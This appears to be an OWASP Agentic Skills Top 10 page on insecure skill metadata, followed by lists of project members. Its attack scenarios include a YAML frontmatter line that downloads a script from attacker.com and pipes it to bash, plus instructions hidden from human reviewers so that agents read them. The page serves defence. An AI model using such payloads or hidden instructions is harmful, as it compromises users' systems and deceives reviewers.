AST04 — Insecure Metadata
Severity: High
Platforms Affected: All
Description
A skill’s metadata and definition files — name, description, author, permissions, requires, risk_tier, and the YAML/JSON/Markdown they are written in — are attacker-controlled inputs the loader reads with little or no validation. This exposes two linked weaknesses: at the semantic layer, fields can impersonate trusted brands, understate permissions, or misdeclare risk tiers to deceive the installer; at the parsing layer, unsafe deserialization of those same files lets an attacker embed executable payloads that trigger on load, before any user action.
Why It’s Unique to Skills
Skill metadata is the primary signal users — and increasingly the installing agent itself — rely on to make trust decisions, yet unlike code it is rarely validated. And because that metadata is deserialized during the skill-loading lifecycle, parsing happens automatically, often silently, and with the agent’s full permission context — so a malicious definition can both deceive the installer and execute code before the skill is ever run. The attack surface includes not just SKILL.md YAML frontmatter but also package.json, manifest.json, requirements.txt, and any configuration pulled in during skill initialization.
Real-World Evidence
- ClawHub: skills named “Google Calendar Integration,” “Solana Wallet Tracker,” “Polymarket Trader” — none affiliated with the named brands. No trademark validation at publish time.
- Snyk (Feb 10, 2026): documented a malicious “Google” skill that passed casual inspection because the name, description, and README were professionally written.
- ASCII smuggling: Snyk’s
toxicskills-goofrepository documents skills that hide instructions via ASCII control characters and base64-encoded strings inSKILL.md— invisible to human reviewers. - PyYAML’s
!!python/objecttag and similar constructs in other parsers allow arbitrary code execution on load; skill loaders written in Python, Node.js, and Ruby are all affected by their respective unsafe defaults. - ClawHavoc staged downloads: the initial
SKILL.mdappeared safe but triggered a secondary payload download during the dependency-installation phase, which runs at skill-load time. - Snyk-documented nested dependency payloads (e.g.,
yutube-dl-core) that execute duringnpm installtriggered automatically by the skill loader.
Attack Scenarios
Brand Impersonation
Publish google-workspace-integration before Google does; capture traffic from users searching for the official skill.
Permission Understating
Declare network: false in metadata while the underlying script calls curl to an external endpoint.
Risk Tier Spoofing
Self-classify as risk_tier: L0 (safe) while embedding destructive operations.
Steganographic Injection
Hide instructions using zero-width Unicode, base64, or ASCII smuggling in Markdown — visible to the agent’s prompt compiler, invisible to human reviewers.
YAML Code Execution
SKILL.md frontmatter contains !!python/object/apply:os.system ["curl attacker.com/payload.sh | bash"] — executes on parse.
Staged Loader
SKILL.md passes a surface scan; a referenced requirements.txt pulls a malicious package that executes at install time.
JSON Prototype Pollution
manifest.json contains a __proto__ key that poisons the skill loader’s object prototype in Node.js runtimes.
TOML / Config Injection
Alternative config formats with insufficient parsing sandboxing allow property injection into the skill runner’s configuration namespace.
Preventive Mitigations
- Use safe parsers by default — disable dangerous tags (
!!python/object,!!python/apply;yaml.load→yaml.safe_load) and apply an allowlist of permitted YAML/JSON keys, rejecting any unexpected fields. - Validate metadata against a schema (e.g., JSON Schema, Pydantic) before any deserialization of skill-provided data.
- Apply static analysis to all metadata fields and
SKILL.mdprose at publish time: flag suspicious patterns in general, and specifically ASCII smuggling, base64 payloads, and zero-width characters invisible to human reviewers. - Validate declared permissions against actual runtime behavior in a sandboxed pre-publish test, and cross-reference
risk_tierdeclarations against the permission manifest scope. - Parse skill files in an isolated, least-privilege subprocess or container — never deserialize with elevated privileges, and treat
requirements.txt,package.json, andpyproject.tomlas untrusted code whose installation is sandboxed. - Enforce brand/trademark protection and surface metadata provenance (who declared it, when, from which signing key) in the registry UI.
OWASP Mapping
- LLM04 (Data and Model Poisoning)
- CWE-345 (Insufficient Verification of Data Authenticity)
- CWE-502 (Deserialization of Untrusted Data)
- ASVS V5.5 (Deserialization)
- A08:2021 (Software and Data Integrity Failures)
MAESTRO Framework Mapping
| MAESTRO Layer | Layer Name | AST04 Mapping |
|---|---|---|
| Layer 7 | Agent Ecosystem | marketplace manipulation, identity spoofing |
| Layer 3 | Agent Frameworks | metadata parsing, validation, and parser safety |
| Layer 4 | Deployment & Infrastructure | runtime sandboxing of deserialization paths |
| Layer 6 | Security & Compliance | metadata integrity, provenance, and safe-parser policy |
MAESTRO Layer Details
- Layer 7: Agent Ecosystem - metadata-based trust decisions and registry abuse.
- Layer 3: Agent Frameworks - how frameworks integrate, verify, and parse skill metadata.
- Layer 4: Deployment & Infrastructure - isolation of skill ingestion and deserialization pipelines.
- Layer 6: Security & Compliance - enforcing schema, metadata authenticity, and safe-parser policies.
Cross-References
- AST01 (Malicious Skills): insecure metadata enables social engineering, and unsafe parsing executes malicious payloads.
- AST02 (Supply Chain Compromise): metadata spoofing and serialized exploits hide supply-chain attacks.
- AST03 (Over-Privileged Skills): misleading permission declarations grant excessive access.
- AST05 (Untrusted External Instructions): AST04 executes payloads from the skill’s own files; AST05 covers instructions loaded from externally referenced documents.
- AST06 (Weak Isolation): host-mode execution amplifies the impact of deserialization code execution.
- AST08 (Poor Scanning): metadata and deserialization attacks both evade pattern-matching scanners.
References
- Snyk ToxicSkills
- Snyk: toxicskills-goof
- Snyk: From SKILL.md to Shell Access
- OWASP Top 10 — A08:2021 Software and Data Integrity Failures
Last updated: June 2026
Example
Put whatever you like here: news, screenshots, features, supporters, or remove this file and don’t use tabs at all.
Leadership & Founding Members
Project Leadership
Current Leaders
Ken Huang
Hammad Atta
Fabio Cerullo
Aonan Guan
Bhavya Gupta
Niv Hoffman
Iftach Orr
Akram Sheriff
AIVSS Distinguished Review Board
The OWASP AIVSS project’s Distinguished Review Board comprises world-renowned cybersecurity leaders, former government officials, and industry pioneers who provide strategic guidance and expert oversight for the AI Vulnerability Scoring System framework. We thank them for their guidance, several of whom have also supported this project’s work.
Rob Joyce
Advisor to PwC and OpenAI, Former Special Assistant to the President and Cybersecurity Coordinator
Jason Clinton
Deputy CISO, Anthropic
Amy R. Steagall
Chief Information Security Officer, Stanford University
Martin Stanley
AI Risk Management Framework Lead, NIST
Apostol Vassilev
Research Supervisor, NIST
Andrew Coyne
CISO, Banner Health, Former CISO, Mayo Clinic
Kevin Rocque
Managing Director/Executive Vice President, Global Technology Risk Officer, TD Bank
Jeff Williams
Former Global OWASP Chair, Founder and CTO, Contrast Security
Michael Tran Duff
University Chief Information Security and Data Privacy Officer, Harvard University
Emil Bender Lassen
Standards Lead, AIUC-1
Agentic Skills Top 10 Founding Members
Founding members of the OWASP Agentic Skills Top 10 project itself — project leads, co-leads, and additional contributors — listed alphabetically. Several also contribute to the sibling OWASP AIVSS project listed above.
Ken Huang
Project Lead, Agentic Skills Top 10
Hammad Atta
Co-Lead, Agentic Skills Top 10
Manish Bhatt
Security Researcher, AWS
Fabio Cerullo
Co-Lead, Agentic Skills Top 10
David Girard
Senior Director, AI Security & AI Alliances, Trend Micro
Aonan Guan
Co-Lead, Agentic Skills Top 10
Bhavya Gupta
Co-Lead, Agentic Skills Top 10
Pamela Gupta
Founder & CEO, OutSecure / Trusted AI
Idan Habler
Staff AI/ML Security Researcher, Intuit
Niv Hoffman
CTO, Air Security
Charles Iheagwara
AI/ML Security Leader, AstraZeneca
Sushmitha Janapareddy
Director - Security Integrations, American Express
Edward Lee
Vice President, Lead AI Security, JP Morgan
KJ Lian
Senior Manager, Data & AI (Public Sector), AWS
Vineeth Sai Narajala
Application Security, AWS
Iftach Orr
Co-Lead, Agentic Skills Top 10
Kanna Sekar
Cyber Security, Google
Akram Sheriff
Co-Lead, Agentic Skills Top 10
Dennis Xu
Research VP, AI, Gartner
OWASP AIVSS Founding Members
The OWASP AIVSS (Agentic AI Vulnerability Scoring System) project is a sibling OWASP initiative focused on scoring the severity of agentic AI vulnerabilities. Its founding members are recognized here as OWASP founding members in the agentic AI security space; many of them have also contributed directly to the Agentic Skills Top 10 project’s research and review process.
Sunil Agrawal
Chief Information Security Officer, Glean
David Ames
Partner, PwC
Michael Bargury
Founder and CTO, Zenity
Joshua Beck
Application Security Architect, SAS
Manish Bhatt
Security Researcher, Amazon Kuiper Security
Mark Breitenbach
Security Engineer, Dropbox
Anat Bremler-Barr
Professor of Computer Science, Tel Aviv University
Siah Burke
HIPAA Security Officer, Siah.ai
David Campbell
AI Security, Scale AI
Ying-Jung Chen
AI safety researcher, PhD, Georgia Institute of Technology
Anton Chuvakin
Security Solution Strategy, Google
Jason Clinton
CISO, Anthorphic
Adam Dawson
Staff AI Security Researcher, Dreadnode
Leon Derczynski
Principal Research Scientist, NVIDIA
Walker Lee Dimon
AI Security Researcher, MITRE
Marissa Dotter
AI Security Researcher, MITRE
Dan Goldberg
ISO Market Lead, Omnicom
David Haber
CEO, Lakera
Idan Habler
Staff AI/ML Security Researcher, Intuit
Jason Haddix
Founder, Arcanum Information Security
Keith Hoodlet
Director of AI/ML & AppSec, Trail of Bits
Ken Huang
AIVSS Project Lead, OWASP
Chris Hughes
CEO, Aquia
Charles Iheagwara
AI/ML Security Leader, AstraZeneca
Krystal Jackson
Researcher, Center for Long-Term Cybersecurity, UC Berkeley
Sushmitha Janapareddy
Director - Security Integrations, American Express
Rob Joyce
Former Cybersecurity Director of NSA, Advisor to PwC, PwC
Diana Kelley
CISO, Noma Security
Prashant Kulkarni
Lead AI Security Research Engineer, Google Cloud
Mahesh Lambe
Founder, MIT, Unify Dynamics
Edward Lee
Vice President, Lead AI Security, JP Morgan
Nate Lee
CEO, Cloudsec.ai
Vishwas Manral
CEO, Precize.ai
Daniela Muhaj
Executive-in-Residence for Research & Development, AI 2030
Vineeth Sai Narajala
Application Security, AWS
Om Narayan
AI Security Researcher, AWS
Varun Pant
Engineering and Product Leader, AI applications at the Automated Reasoning Group, AWS
Advait Patel
Senior Site Reliability Engineer (DevSecOps + Cloud + AIOps), Broadcom, IEEE
Alex Polyakov
CEO, adversa.ai
Ramesh Raskar
Professor & Director, MIT Media Lab
Ron F. Del Rosario
VP-Head of AI Security, SAP
Tal Shapira
Co-Founder & CTO, Reco AI
Akram Sheriff
Senior AI/ML Software Engineering Leader, Cisco
Samantha Siau
Security and Compliance, Anthropic
Kevin Simmonds
Partner on AI Offensive Security, PWC
Martin Stanley
NIST AI RMF Lead, Independent
Omar A. Turner
General Manager of Security, Microsoft
Apostol Vassilev
AI Research Team Supervisor, NIST
Matthew Versaggi
AI Fellow, White House Presidential Innovation Fellow
David Webb
Agency Cybersecurity Officer, Cybersecurity and Infrastructure Security Agency
Dennis Xu
Research VP, AI, Gartner
Xiaochen Zhang
Executive Director and Chief Responsible AI Officer, AI 2030
Recognition
We extend our gratitude to all founding members who have contributed to establishing this crucial framework for AI security assessment. Their vision and dedication have been instrumental in shaping the Agentic Skills Top 10 project.
Get Involved
Interested in contributing to the Agentic Skills Top 10 project? We welcome new contributors and leaders. Please see our Contribution Guidelines for more information on how to get involved.